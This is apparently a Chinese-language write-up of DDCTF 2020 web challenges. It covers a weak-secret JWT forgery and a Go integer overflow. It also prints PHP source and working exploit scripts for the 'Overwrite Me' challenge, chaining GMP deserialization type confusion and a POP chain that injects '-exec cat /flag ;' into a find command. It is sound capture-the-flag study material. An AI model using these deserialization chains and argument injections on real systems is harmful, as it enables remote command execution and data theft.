难哭了!😭

web

Web签到题

传下参,很明显是JWT

userRole改成ADMIN,密钥设置成admin成功得到客户端,后来才知道这个密码好像和用户名一样

接着就不会了

卡片商店

go语言整数溢出漏洞,直接向朋友借1844674407370955161个发现

很明显发生了溢出,然后把借的还了兑换礼物就能得到

1
url: /flag , SecKey: Udc13VD5adM_c10nPxFu@v12

访问提示不是幸运玩家,找到伪造cookie:https://github.com/EddieIvan01/secure-cookie-faker

Overwrite Me

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
<?php
error_reporting(0);
class MyClass
{
var $kw0ng;
var $flag;

public function __wakeup()
{
$this->kw0ng = 1;
}

public function get_flag()
{
return system('find /FlagNeverFall ' . escapeshellcmd($this->flag));
}
}

class Prompter
{
protected $hint;
public function execute($value)
{
include($value);
}

public function __invoke()
{
if(preg_match("/gopher|http|file|ftp|https|dict|zlib|zip|bzip2|data|glob|phar|ssh2|rar|ogg|expect|\.\.|\.\//i", $this->hint))
{
die("Don't Do That!");
}
$this->execute($this->hint);
}
}

class Display
{
public $contents;
public $page;
public function __construct($file='/hint/hint.php')
{
$this->contents = $file;
echo "Welcome to DDCTF 2020, Have fun!<br/><br/>";
}
public function __toString()
{
return $this->contents();
}

public function __wakeup()
{
$this->page->contents = "POP me! I can give you some hints!";
unset($this->page->cont);
}
}

class Repeater
{
private $cont;
public $content;
public function __construct()
{
$this->content = array();
}

public function __unset($key)
{
$func = $this->content;
return $func();
}
}

class Info
{
function __construct()
{
eval('phpinfo();');
}

}

$show = new Display();
$bullet = $_GET['bullet'];

if(!isset($bullet))
{
highlight_file(__FILE__);
die("Give Me Something!");
}else if($bullet == 'phpinfo')
{
$infos = new Info();
}else
{
$obstacle = new stdClass;
$mc = new MyClass();
$mc->flag = "MyClass's flag said, Overwrite Me If You Can!";
@unserialize($bullet);
echo $mc->get_flag();
}

访问/hint/hint.php提示和GMP扩展相关,搜了搜发现是GMP扩展反序列化类型混淆漏洞:https://hackerone.com/reports/198734

测试去除$obstacle = new stdClass;可以替换参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
class MyClass
{
var $kw0ng;
var $flag;

public function __wakeup()
{
$this->kw0ng = 1;
}

public function get_flag()
{
echo $this->flag."\n";
}
}
// $obstacle = new stdClass;
$mc = new MyClass();
$mc->flag = "id";
$inner = 's:1:"1";a:2:{s:4:"flag";s:6:"whoami";i:0;O:7:"MyClass":1:{s:5:"kw0ng";R:2;}}';
$exp = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
// echo urlencode($exp);
@unserialize($exp);
$mc->get_flag();
// var_dump($obstacle);

构造POP链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
error_reporting(0);

class Prompter
{
protected $hint;
public function __construct()
{
$this->hint = 'EOf9uk3nSsVFK1LQ.php';
}
}

class Display
{
public $contents;
public $page;
public function __construct()
{
$this->page = new Repeater();
}
}

class Repeater
{
private $cont;
public $content;
public function __construct()
{
$this->content = new Prompter();
}
}
$a = new Display();
$b=serialize($a);
echo urlencode($b);

可以文件包含,但从phpinfo有open_basedir限制,向页面POST上传文件无响应

后来才知道,原来是可以任意类的任意函数执行的,漏洞点就在于:

1
2
3
4
5
public function __unset($key)
{
$func = $this->content;
return $func();
}

$func()那里,如果可控的话,可以任意类中的方法调用的,看一个例子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
class T
{
public function test()
{
echo 456;
}
public function test1($a){
echo $a;
}
}

$a = array(new T,'test');
$a();

$b = array('t','Test');
$b();

$c = array('t','test1');
$c('456');

// 上面三个例子均会输出456

由此,pop链可以为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
error_reporting(0);

class MyClass
{
var $kw0ng;
var $flag;
public function __construct(){
$this->flag = '-exec cat /flag ;';
}
public function __wakeup()
{
$this->kw0ng = 1;
}

}

class Display
{
public $contents;
public $page;
public function __construct()
{
$this->page = new Repeater();
}
}

class Repeater
{
private $cont;
public $content;
public function __construct()
{
$this->content = array(new MyClass(),'get_flag');
}
}
$a = new Display();
$b=serialize($a);
echo urlencode($b);

评论